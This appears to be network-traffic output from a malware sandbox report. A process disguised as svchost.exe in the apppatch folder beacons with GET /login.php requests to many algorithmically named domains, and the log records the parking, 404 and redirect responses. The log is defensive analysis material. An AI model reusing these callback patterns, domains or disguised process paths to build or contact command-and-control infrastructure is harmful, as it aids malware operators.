                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49719 | 44.221.84.105 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.571708918 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
Nov 11, 2024 18:50:28.995461941 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49720 | 44.221.84.105 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.613887072 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
Nov 11, 2024 18:50:29.047924995 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49721 | 75.2.71.199 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.623383999 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49722 | 208.100.26.245 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.638107061 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:50:29.129251003 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:29 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:29.835262060 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:50:29.938725948 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:29 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:48.354407072 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:50:48.461287022 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:48.575489998 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:50:48.686667919 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49723 | 199.59.243.227 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.681142092 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
Nov 11, 2024 18:50:29.132131100 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:05:29 GMT; path=/
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:50:29.132220984 CET | 528 | IN
                                                                                                                                                                                                                  Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDI5LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49724 | 23.253.46.64 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.866193056 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyqah.com
Nov 11, 2024 18:50:29.336357117 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:50:23 GMT
Content-Length: 1245
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:50:29.336369038 CET | 169 | IN
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49725 | 85.17.31.122 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.902904034 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49726 | 75.2.71.199 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:28.998550892 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49728 | 154.212.231.82 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:29.835361958 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:50:30.765034914 CET | 696 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:50:30 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:30.777519941 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:50:31.135122061 CET | 696 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:50:30 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:48.288753986 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:50:48.664972067 CET | 696 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:50:48 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:48.740748882 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:50:49.127126932 CET | 696 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:50:48 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49729 | 85.17.31.122 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:29.839247942 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49731 | 45.79.19.196 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:30.695207119 CET | 300 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww8.galyqaz.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:50:31.178309917 CET | 191 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                  server: openresty/1.13.6.1
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  content-type: text/plain
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 46 0d 0a 49 6e 76 61 6c 69 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: FInvalid Request0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49733 | 64.190.63.136 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:32.616396904 CET | 300 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww3.galyqaz.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:50:33.234577894 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:33 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:50:33 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-jngxs
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==><head><meta charset="utf-8"><title>galyqaz.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;galyqaz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! galyqaz.com is your first and bes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49739 | 13.248.169.48 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:33.370172024 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: pupydeq.com
Nov 11, 2024 18:50:33.801198959 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: openresty
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:33 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 114
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49740 | 188.114.97.3 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:33.700877905 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
Nov 11, 2024 18:50:34.460958004 CET | 793 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vvbW73Eg9A02F7wNDgrqlkOJW0c2zScboJeBTmcMDmTd%2Bw3WFoKnryQuX8U9gyHGk6KrLuog8vGhjib9oTew2Qivtq4gpTE2R2qM90o%2Bx7wcmbaDU8BM6Gbzd8EKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102016e8017cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:50:34.461952925 CET | 168 | IN | Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:50:34.461971998 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0
Nov 11, 2024 18:50:36.289581060 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
Nov 11, 2024 18:50:36.618305922 CET | 984 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
